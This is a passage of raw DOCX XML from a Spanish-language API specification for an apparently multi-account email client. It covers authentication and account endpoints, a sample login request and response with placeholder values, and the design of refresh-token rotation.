        <w:gridCol w:w="880"/>
        <w:gridCol w:w="1906"/>
        <w:gridCol w:w="1906"/>
        <w:gridCol w:w="2053"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Método</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Body Params</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Query Params</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/auth/login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Valida credenciales IMAP y emite tokens JWT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">email: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">password: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">imapHost?: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">imapPort?: number</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">imapSecure?: boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/auth/logout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Revoca el refresh token y cierra conexiones IMAP</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GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/auth/me</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Devuelve el usuario autenticado y sus cuentas vinculadas</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POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/auth/refresh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Emite un nuevo access token usando el refresh token (cookie)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POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/auth/oauth/init</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Inicia flujo OAuth2 para Gmail/Microsoft</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">provider: 'gmail' \| 'microsoft'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/auth/oauth/callback</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Completa flujo OAuth2 e intercambia code por token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">code: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">provider: 'gmail' \| 'microsoft'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Ejemplo de request/response para login:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Request POST /api/auth/login</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:br/>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"usuario@ejemplo.com"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"password"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"contraseña_segura"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"imapHost"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"imap.ejemplo.com"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"imapPort"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">993</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"imapSecure"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">true</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Response 200 OK</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"accessToken"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"eyJhbGciOiJIUzI1NiIs..."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"expiresIn"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">900</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"user"</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"507f1f77bcf86cd799439011"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"primaryEmail"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"usuario@ejemplo.com"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"displayName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Usuario Ejemplo"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"accounts"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"507f1f77bcf86cd799439012"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>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"usuario@ejemplo.com"</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"Principal"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"isPrimary"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"active"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El endpoint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /api/auth/login</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ejecuta una conexión IMAP transitoria mediante imapflow para validar las credenciales contra el servidor real antes de emitir tokens. Esta decisión elimina la necesidad de mantener una tabla de passwords local y garantiza que el usuario tiene acceso activo a su cuenta de correo en el momento del login</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[1]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La rotación de refresh tokens implementa un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tokenRegistry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en Redis que trackea el estado de cada token (Token ID, Family ID, Previous Token hash, Revocation Status). Si se detecta reúso de un token revocado, se revoca toda la familia de tokens y se fuerza re-autenticación</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[157]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="89"/>
    <w:bookmarkStart w:id="90" w:name="cuentas"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.2 Cuentas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El módulo de cuentas gestiona la configuración multi-inbox, permitiendo a un usuario vincular múltiples servidores de correo (Gmail personal, Exchange corporativo, IMAP propio) con sincronización independiente por cuenta.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1173"/>
        <w:gridCol w:w="880"/>
        <w:gridCol w:w="1906"/>
        <w:gridCol w:w="1906"/>
        <w:gridCol w:w="2053"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Método</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Body Params</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Query Params</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lista todas las cuentas del usuario autenticado</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GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/accounts/:id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Obtiene detalle de una cuenta específica</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POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Añade una nueva cuenta IMAP/SMTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">name: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">email: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">imap: ImapConfig</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">smtp: SmtpConfig</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">isPrimary?: boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">PATCH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
